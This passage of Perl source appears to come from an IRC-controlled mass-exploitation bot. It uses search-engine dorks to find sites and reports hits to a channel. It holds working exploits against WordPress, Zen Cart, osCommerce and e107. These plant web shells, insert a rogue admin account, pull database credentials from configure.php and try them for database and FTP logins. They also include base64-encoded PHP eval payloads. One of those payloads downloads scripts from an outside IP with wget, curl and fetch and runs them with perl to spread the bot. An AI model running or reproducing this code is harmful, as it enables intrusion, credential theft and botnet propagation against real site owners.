657. if ($engine =~ /jackdk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKDK",$type); } exit; } }
658. if ($engine =~ /jackes/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKES",$type); } exit; } }
659. if ($engine =~ /jackeu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKEU",$type); } exit; } }
660. if ($engine =~ /jackfr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKFR",$type); } exit; } }
661. if ($engine =~ /jackhu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKHU",$type); } exit; } }
662. if ($engine =~ /jackid/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKID",$type); } exit; } }
663. if ($engine =~ /jackil/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKIL",$type); } exit; } }
664. if ($engine =~ /jackin/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKIN",$type); } exit; } }
665. if ($engine =~ /jackinfo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKInfO",$type); } exit; } }
666. if ($engine =~ /jackir/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKIR",$type); } exit; } }
667. if ($engine =~ /jackit/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKIT",$type); } exit; } }
668. if ($engine =~ /jackjp/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKJP",$type); } exit; } }
669. if ($engine =~ /jackkr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKKR",$type); } exit; } }
670. if ($engine =~ /jackmx/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKMX",$type); } exit; } }
671. if ($engine =~ /jackmy/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKMY",$type); } exit; } }
672. if ($engine =~ /jacknet/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKNeT",$type); } exit; } }
673. if ($engine =~ /jacknl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKNL",$type); } exit; } }
674. if ($engine =~ /jackorg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKOrG",$type); } exit; } }
675. if ($engine =~ /jackph/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKPH",$type); } exit; } }
676. if ($engine =~ /jackpl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKPL",$type); } exit; } }
677. if ($engine =~ /jackro/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKRO",$type); } exit; } }
678. if ($engine =~ /jackru/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKRU",$type); } exit; } }
679. if ($engine =~ /jackth/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKTH",$type); } exit; } }
680. if ($engine =~ /jackua/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKUA",$type); } exit; } }
681. if ($engine =~ /jackuk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKUK",$type); } exit; } }
682. if ($engine =~ /jackus/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKUS",$type); } exit; } }
683. if ($engine =~ /jacksi/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKSI",$type); } exit; } }
684. if ($engine =~ /jackbe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKBE",$type); } exit; } }
685. if ($engine =~ /jackbiz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKBIZ",$type); } exit; } }
686. }
687. if ($engine =~ /google/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"GooGLe",$type); } exit; } }
688. if ($gps2 ==1) {
689. if ($engine =~ /bing/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"Bing",$type); } exit; } }
690. if ($engine =~ /biglobe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"BigLobe",$type); } exit; } }
691. if ($engine =~ /walla/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"WaLLa",$type); } exit; } }
692. if ($engine =~ /yahoo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"YaHoo",$type); } exit; } }
693. if ($engine =~ /ask/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"AsK",$type); } exit; } }
694. if ($engine =~ /uol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"UoL",$type); } exit; } }
695. if ($engine =~ /onet/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"OnEt",$type); } exit; } }
696. if ($engine =~ /clusty/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"CLusTy",$type); } exit; } }
697. if ($engine =~ /sapo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"SaPo",$type); } exit; } }
698. if ($engine =~ /aol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"AoL",$type); } exit; } }
699. if ($engine =~ /lycos/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"LyCos",$type); } exit; } }
700. if ($engine =~ /hotbot/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"HotBot",$type); } exit; } }
701. if ($engine =~ /seznam/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"SeZNam",$type); } exit; } }
702. }
703. }
704.  
705.  
706. ###### EXPLOITING #######
707. sub rfg_exploit() {
708. my $chan = $_[0];
709. my $bugz = $_[1];
710. my $simpan = $_[2];
711. my $dork = $_[3];
712. my $engine = $_[4];
713. my $count = 0;
714. my @totexploit = &search_engine($chan,$bugz,$dork,$engine,$rfglogo);
715. my $num = scalar(@totexploit);
716. if ($num > 0){
717. foreach my $site(@totexploit){
718. $count++;
719. if ($count == $num-1) { &msg("$chan","$rfglogo $engine Finished for $dork "); }
720. my $test = "http://garguritos.com/rfg.php?url=http://".$site;
721. my $html = &get_content($test);
722. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
723. my $vpath = "wp-content/plugins/radykal-fancy-gallery/admin/";
724. if ($html =~ /<a href=\"http:\/\/(.*)$vpath(.*)\">Your shell/){
725. my $vuln = $1; my $qr = $2;
726. my $upl = "http://".$vuln.$vpath.$qr."wget%20".$thumbshell;
727. my $crut = &get_content($upl);
728. if ($crut =~ /3xploit/) {
729. my $shell = "http://".$vuln.$vpath."bad.php";
730. my $check = &get_content($shell);
731. if ($check =~ /stunshell/i){
732. my $safe = ""; my $os = ""; my $uid = "";
733. if ($check =~ m/SAFE_MODE: <b><font color=blue>(.*?)<\/font>/) {$safe = $1;}
734. if ($check =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
735. if ($check =~ m/uid=(.*?)gid=/) {$uid = $1;}
736. &msg("$admin","$rfglogo $engine <=> sHeLL <=> ".$shell." (SafeMode=$safe) (OS=$os) uid=$uid ");
737. &msg("$chan","$rfglogo $engine <=> sHeLL <=> ".$shell." (SafeMode=$safe) (OS=$os) uid=$uid ");
738. } else {
739. &msg("$chan","$rfglogo $engine <=> VulN <=> http://".$vuln.$vpath.$qr." 15");
740. }
741. }
742. }
743. } exit; }
744. }
745. }
746. }
747.  
748. sub zen_exploit() {
749. my $chan = $_[0];
750. my $bug = $_[1];
751. my $simpan = $_[2];
752. my $dork = $_[3];
753. my $engine = $_[4];
754. my $count = 0;
755. my @totexploit = &search_engine($chan,$bug,$dork,$engine,$zenlogo);
756. my $num = scalar(@totexploit);
757. if ($num > 0){
758. foreach my $site(@totexploit){
759. $count++;
760. if ($count == $num-1) { &msg("$chan","$zenlogo $engine Finished for $dork "); }
761. my $test = "http://".$site.$bug;
762. my $html = &get_content($test);
763. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
764. if ($html =~ /zc_install/){
765. &zen_query($chan,$site,$test,$engine);
766. }
767. } exit; }
768. }
769. }
770. }
771.  
772. sub zen_query() {
773. my $chan = $_[0];
774. my $url = $_[1];
775. my $test = $_[2];
776. my $engine = $_[3];
777. my $code = "INSERT+INTO+admin+%28admin_id%2C+admin_name%2C+admin_email%2C+admin_pass%29+VALUES+%2856%2C%27adminsys%27%2C%27admin%40mazacrew.co.cc%27%2C%27617ec22fbb8f201c366e9848c0eb6925%3A87%27%29%3B";
778. my $req = HTTP::Request->new(POST => $test);
779. $req->content_type("application/x-www-form-urlencoded");
780. $req->content("query_string=".$code);
781. my $ua = LWP::UserAgent->new(agent => $uagent);
782. $ua->timeout(3);
783. my $res = $ua->request($req);
784. my $data = $res->as_string;
785. if ( $data =~ /1 statements processed/i ) {
786. &msg("$chan","$zenlogo $engine <=> VulN <=> http://".$url."admin/login.php ");
787. &msg("$admin","$zenlogo $engine <=> VulN <=> http://".$url."admin/login.php ");
788. }
789. elsif ( $data =~ /Duplicate entry/i ) {
790. &msg("$chan","$zenlogo $engine <=> SuccesS <=> http://".$url."admin/login.php )");
791. &msg("$admin","$zenlogo $engine <=> SuccesS <=> http://".$url."admin/login.php ");
792. }
793. }
794.  
795. sub osco_exploit() {
796. my $chan = $_[0];
797. my $bug = $_[1];
798. my $simpan = $_[2];
799. my $dork = $_[3];
800. my $engine = $_[4];
801. my $count = 0;
802. my @totexploit = &search_engine($chan,$bug,$dork,$engine,$oscologo);
803. my $num = scalar(@totexploit);
804. if ($num > 0){
805. foreach my $site(@totexploit){
806. $count++;
807. if ($count == $num-1) { &msg("$chan","$oscologo $engine Finished for $dork "); }
808. my $cat = "http://".$site."admin/categories.php/login.php";
809. my $fm = "http://".$site."admin/file_manager.php/login.php";
810. my $bm = "http://".$site."admin/banner_manager.php/login.php";
811. my $shell = "http://".$site."images/lobex.php";
812. my $dumper = "http://".$site."images/lobexdb.php";
813. my $coba = &get_content($cat);
814. my $cob2 = &get_content($fm);
815. my $cob3 = &get_content($bm);
816. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
817. if ($coba =~ /TABLE_HEADING_CATEGORIES_PRODUCTS/i ) {
818. my $test = $cat."?action=download&filename=/includes/configure.php";
819. my $cek = &get_content($test);
820. if ($cek =~ /http:\/\//) {
821. &osql_xpl($test,$chan,$site,$engine);
822. }
823. my $aplod = LWP::UserAgent->new;
824. my $res = $aplod->post($cat."?cPath=&action=new_product_preview",['products_image' => ['./lobex.jpg' => 'lobex.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $res->as_string;
825. my $resa = $aplod->post($cat."?cPath=&action=new_product_preview",['products_image' => ['./mysql.jpg' => 'lobexdb.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resa->as_string;
826. my $cekap = &get_content($shell);
827. if ($cekap =~ /UnKnown - Simple Shell/) {
828. my $safe = ""; my $os = ""; my $uid = "";
829. if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
830. if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
831. if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
832. &msg("$chan","$oscologo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
833. &msg("$admin","$oscologo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
834. &msg("$chan","$oscologo $engine <=> Dumper <=> $dumper ");sleep(1);
835. }
836. }
837. if ($cob2 =~ /TABLE_HEADING_FILENAME/i) {
838. my $test2 = $fm."?action=download&filename=/includes/configure.php";
839. my $cek2 = &get_content($test2);
840. if ($cek2 =~ /http:\/\//) {
841. &osql_xpl($test2,$chan,$site,$engine);
842. }
843. my $aplod2 = LWP::UserAgent->new;
844. my $res2 = $aplod2->post($fm."?action=processuploads",['file_1' => ['./lobex.jpg' => 'lobex.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $res2->as_string;
845. my $resb = $aplod2->post($fm."?action=processuploads",['file_1' => ['./mysql.jpg' => 'lobexdb.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resb->as_string;
846. my $cekap = &get_content($shell);
847. if ($cekap =~ /UnKnown - Simple Shell/) {
848. my $safe = ""; my $os = ""; my $uid = "";
849. if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
850. if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
851. if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
852. &msg("$chan","$oscologo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
853. &msg("$admin","$oscologo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
854. &msg("$chan","$oscologo $engine <=> Dumper <=> $dumper ");sleep(1);
855. }
856. }
857. if ($cob3 =~ /TABLE_HEADING_BANNERS/i) {
858. my $test3 = $bm."?action=download&filename=/includes/configure.php";
859. my $cek3 = &get_content($test3);
860. if ($cek3 =~ /http:\/\//) {
861. &osql_xpl($test3,$chan,$site,$engine);
862. }
863. my $aplod3 = LWP::UserAgent->new;
864. my $res3 = $aplod3->post($bm."?action=insert",['banners_image' => ['./lobex.jpg' => 'lobex.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $res3->as_string;
865. my $resc = $aplod3->post($bm."?action=insert",['banners_image' => ['./mysql.jpg' => 'lobexdb.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resc->as_string;
866. my $cekap = &get_content($shell);
867. if ($cekap =~ /UnKnown - Simple Shell/) {
868. my $safe = ""; my $os = ""; my $uid = "";
869. if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
870. if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
871. if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
872. &msg("$chan","$oscologo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
873. &msg("$admin","$oscologo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
874. &msg("$chan","$oscologo $engine <=> Dumper <=> $dumper ");sleep(1);
875. }
876. }
877. } exit;
878. }
879. }
880. }
881. }
882.  
883. sub osql_xpl() {
884. my $url = $_[0];
885. my $chan = $_[1];
886. my $site = $_[2];
887. my $engine = $_[3];
888. my $request = HTTP::Request->new(GET=>$url);
889. my $browser = LWP::UserAgent->new();
890. $browser->timeout(10);
891. my $response = $browser->request($request);
892. my @dbsinfo;
893. if ($response->is_success) {
894. my $dpath = ""; my $dbserver = ""; my $dbuser = ""; my $dbpass = ""; my $dbname = "";
895. my $res = $response->as_string;
896. if ($res =~ m/'DIR_FS_CATALOG', '(.*)'/g) {
897. $dpath = $1;
898. &msg("$chan","$oscosqllogo $engine <=> http://".$site." [+]DIR path: $dpath");
899. }
900. if ($res =~ m/'DB_SERVER', '(.*)'/g) {
901. $dbserver = $1;
902. &msg("$chan","$oscosqllogo $engine <=> http://".$site." [+]DB Server: $dbserver");
903. }
904. if ($res =~ m/'DB_SERVER_USERNAME', '(.*)'/g) {
905. $dbuser = $1;
906. &msg("$chan","$oscosqllogo $engine <=> http://".$site." [+]DB username: $dbuser");
907. }
908. if ($res =~ m/'DB_SERVER_PASSWORD', '(.*)'/g) {
909. $dbpass = $1;
910. &msg("$chan","$oscosqllogo $engine <=> http://".$site." [+]DB password: $dbpass");
911. }
912. if ($res =~ m/'DB_DATABASE', '(.*)'/g) {
913. $dbname = $1;
914. &msg("$chan","$oscosqllogo $engine <=> http://".$site." [+]DB database: $dbname");
915. }
916. my $hosts = "http://".$site;
917. if($hosts =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) {
918. $host = $2;
919. &dbi_connect($host,$dbuser,$dbpass,$dbname,$chan,$engine,$oscologo);sleep(1);
920. if ($dbuser =~ /_/) { my @users = split("_",$dbuser); my $dbuser = $users[0]; }
921. &ftp_connect($url,$host,$dbuser,$dbpass,$chan,$engine,$oscologo);sleep(1);
922. }
923. }
924. }
925.  
926. sub e107_exploit() {
927. my $chan = $_[0];
928. my $bug = $_[1];
929. my $simpan = $_[2];
930. my $dork = $_[3];
931. my $engine = $_[4];
932. my $count = 0;
933. my @totexploit = &search_engine($chan,$bug,$dork,$engine,$e107logo);
934. my $num = scalar(@totexploit);
935. if ($num > 0){
936. foreach my $site(@totexploit){
937. $count++;
938. if ($count == $num-1) { &msg("$chan","$e107logo $engine Finished for $dork "); }
939. my $test = "http://".$site.$bug;
940. my $shellz = "http://".$site."/images/lobex.php";
941. my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ==";
942. my $html = &e107_rce_query($test,$code);
943. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
944. if ($html =~ /v0pCr3w<br>sys:(.+?)<br>nob0dyCr3w/) {
945. my $sys = $1;
946. my $upload = "";
947. my $res = &e107_rce_query($test);
948. if ($res =~ /lobexxx/) {
949. my $check = &get_content($shellz);
950. if ($check =~ /UnKnown - Simple Shell/) {
951. &msg("$chan","$e107logo $engine <=> SheLL <=> $shellz ");sleep(2);
952. }
953. } else { &msg("$chan","$e107logo $engine <=> System <=> $test ($sys) ");sleep(2); }
954. }
955. } exit; }
956. }
957. }
958. }
959.  
960. sub e107_rce_query() {
961. my $url = $_[0];
962. my $code = encode_base64('echo "lobexxx";')."JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWw2UXVOVEVQNWNKUDdEc3MzSmpnNGNxRWZwQkRGcWxKZ1N0UkFhSi8wQ3lHWHNXcktIdmJacDErUkZ4SC92eks2ZGwrT09SZWtpb1Rnenp6TXZ6ODZPNlg0czUrWHVqbTlYOFU5UlY4ZEZ1KzJUM1IwbWNpRWp5Y3BQZHk1ejdpRWErWlM0ZTF3cHB0MUpGQVp1MkI5YzN6cVQrR2I4NE55MzJ6ODk3ZTYwSHJuaU9pa3FvWWxDRG9IVVRiQUpQQ0p1K0dvd3ZLV1hvOUZhWnprSVZQUWUzVng4M21VUGc3L0dUamlLeHNPK0JWbUtad2tJR3FjeFRNWnZVNERCRWxydUJJWlRQbEtZaXFjc1Axa1pRRDlrd2FNWlIrbWdNY3FMbERtcitrckFObXgzS1paSGt1c2xoQS9QTG9Mb2Q5QUxJTURnNG9LZVBJTUttVyt2b0s0QmNVVXpURExwVU1ac29mUnhLZUtjdWF1T0hQc2RuZlZ0VUpDcDdwazk2RTlQa08rUmhzSFZZQlI1a1BLWWRDNjF2Y09oeEJLWW4zTjE5WklpcC91RUdxWG9QcjJNRmMvSVltc3NzU0JtcmN2alFhZlJDa2Q0MnJrVC9Sc1NNdm5Jc0pDNml6dE93TnF2MDRDNXFaV2F5bDhjZTMzS2VMRmVJTjYvTnlyeHFkdU16dS9CNk5aV3NrOHdIQnVjR2toSE1tNmJadUNFNThQK3pTaTY2UDhaWEo5ZEJZNlpoWlFwelltL1UvVUc1K09yNEcwVURRZURrV2J2MGM2aVBPQWl5U3FBNHJQaWJKa3hEOFljcDFFeUs3UE50MEo1d0xaNjRBZU8wUEdiVStqWWpoQ0FrbXhPZFVwbW5iSFRzZmhRRkF0T0RsVjFkeWZobkhKTXQzQzkzWWswZjloYVdwc1dZOWtVLzRmNXY1Q2t5T0RVZnY1Z1BnQThwZDRxdDFTN25jbUszQUp3UjhHaCs5U2xIclFhZ1FIMDBjYm90ajNhZm5pT01SQ2dtWXFudm9tVUwrRVJJcXhGYTVUTTFzN1oxODdOc3Q2VUR3OFJFa1U4MXFneVZOcmVEak90VWFKdXBaRmxBY2tJemt1eVZlMTlXTkJ4SjdKSStWZFlUQmJLVXYrKzAyVE1RQnJYSHZveUpveXJmV09FRHNsbkpRVk9pd2ZnNW9TZk51eHoybmo3dDBYYzNmMmZISUQrZnBJNkVWZm1nSEV5SnptdUUwUDZCdmNyaVkwR1BxV25yd3R0WHVSc0xOSlR3QzRYY3FXSlhwYk1wNXA5MFpTZ3hqNWE4cFJoZThOM2t2TzEzOGFoNURIT0t2UDdBZkFkck96VU9kbXVsTUVCbVJCc2xYWmV3b3ZINEE3U1M4ZGE1Vm83Mk0xL3REQXVzeUpCeVFYUG1IYWpnK2dYM2N4c21qSkVTcXQ1N1Z1QUtmQjROODRtL3FSb3pnODIycXRJWExPRmJoK1R6U0kyNHFPYWxuMzBlSjFVc0FVK1E1SnhzVVcranJjSXRzamFWQ2R0cGExNmExamVqUldMaXQwNmx0d3MyY293Ulk3YnZsemZnYjJXcWFQaDFPVUE2Y2s0ekVYR0xSemVPbzBremozZ0RNak1ibDQ4c3NoVGRIYUVBUGViRkoyWGthWEI1bDFJNDVrMGFERS9KQlJwZVBkVk14WHdsbkVwN29WMGJ4Y3kyZktIU0pMQXYwQlJnOG43T2h3c3IrTWVvU2ZrMmR5MkZ5TFhVTitvREdyRVZVazc4OVM4dVlEVnJLU0lmZUZYSzJ1ekxKVnp1Yk5FWWJlVWVXWUw0clRFa3NWcFJUQXlXWnp5anc0UDN4Rk1MUERwbmNIYlF5NG1ZcS9wbllhL0diUFQ1TER0ZkR6OUZ3PT0iKSkpOwokZmljaGllciA9IGZvcGVuKCcuL2ltYWdlcy9sb2JleC5waHAnLCd3Jyk7CmZ3cml0ZSgkZmljaGllciwgJGMpOwpmY2xvc2UoJGZpY2hpZXIpOwo=";
963. my $req = HTTP::Request->new(POST => $url);
964. $req->content_type('application/x-www-form-urlencoded');
965. $req->content("send-contactus=1&author_name=[php]eval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D");
966. my $ua = LWP::UserAgent->new(agent => $uagent);
967. $ua->timeout(7);
968. my $res = $ua->request($req);
969. return $res->content;
970. }
971.  
972. sub e107_spread_query() {
973. my $url = $_[0];
974. my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3O2NkIC90bXA7cm0gLXJmIGRvci4qICoudHh0Lio7ZmV0Y2ggaHR0cDovLzIxNy4xNi44LjIzL353ZWJtYWlsL3htbC50eHQ7cGVybCB4bWwudHh0O3JtIC1yZiB4bWwudHh0O3dnZXQgaHR0cDovLzIxNy4xNi44LjIzL353ZWJtYWlsL3htbC50eHQ7cGVybCB4bWwudHh0O3JtIC1yZiB4bWwudHh0O2N1cmwgLU8gaHR0cDovLzIxNy4xNi44LjIzL353ZWJtYWlsL3htbC50eHQ7cGVybCB4bWwudHh0O3JtIC1yZiB4bWwudHh0O2x3cC1kb3dubG9hZCBodHRwOi8vMjE3LjE2LjguMjMvfndlYm1haWwveG1sLnR4dDtwZXJsIHhtbC50eHQ7Y2QgL3Zhci90bXA7cm0gLXJmIGRvci4qICouanBnLio7ZmV0Y2ggaHR0cDovLzIxNy4xNi44LjIzL353ZWJtYWlsL3hwbC50eHQ7cGVybCB4cGwudHh0O3JtIC1yZiB4cGwudHh0O3dnZXQgaHR0cDovLzIxNy4xNi44LjIzL353ZWJtYWlsL3hwbC50eHQ7cGVybCB4cGwudHh0O3JtIC1yZiB4cGwudHh0O2N1cmwgLU8gaHR0cDovLzIxNy4xNi44LjIzL353ZWJtYWlsL3hwbC50eHQ7cGVybCB4cGwudHh0O3JtIC1yZiB4cGwudHh0O2x3cC1kb3dubG9hZCBodHRwOi8vMjE3LjE2LjguMjMvfndlYm1haWwveHBsLnR4dDtwZXJsIHhwbC50eHQ7IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7ZWNobyAkZXNlZ3VpY21kOw0KZnVuY3Rpb24gZXgoJGNmZSl7DQokcmVzID0gJyc7DQppZiAoIWVtcHR5KCRjZmUpKXsNCmlmKGZ1bmN0aW9uX2V4aXN0cygnZXhlYycpKXsNCkBleGVjKCRjZmUsJHJlcyk7DQokcmVzID0gam9pbigiXG4iLCRyZXMpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc2hlbGxfZXhlYycpKXsNCiRyZXMgPSBAc2hlbGxfZXhlYygkY2ZlKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3N5c3RlbScpKXsNCkBvYl9zdGFydCgpOw0KQHN5c3RlbSgkY2ZlKTsNCiRyZXMgPSBAb2JfZ2V0X2NvbnRlbnRzKCk7DQpAb2JfZW5kX2NsZWFuKCk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdwYXNzdGhydScpKXsNCkBvYl9zdGFydCgpOw0KQHBhc3N0aHJ1KCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3BvcGVuJykpew0KJGYgPSBAcG9wZW4oJGNmZSwiciIpOw0Kd2hpbGUoIUBmZW9mKCRjZmUpKSB7ICRyZXMgLj0gQGZyZWFkKCRjZmUsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ==";
975. my $req = HTTP::Request->new(POST => $url);
976. $req->content_type('application/x-www-form-urlencoded');
977. $req->content("send-contactus=1&author_name=%5Bphp%5Deval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D");
978. my $ua = LWP::UserAgent->new(agent => $uagent);
979. $ua->timeout(7);
980. my $res = $ua->request($req);
981. }
982.  
983. sub ih_exploit() {
984. my $chan = $_[0];
985. my $bug = $_[1];
986. my $simpan = $_[2];
987. my $dork = $_[3];
988. my $engine = $_[4];
989. my $count = 0;
990. my @totexploit = &search_engine($chan,$bug,$dork,$engine,$ihlogo);
991. my $num = scalar(@totexploit);
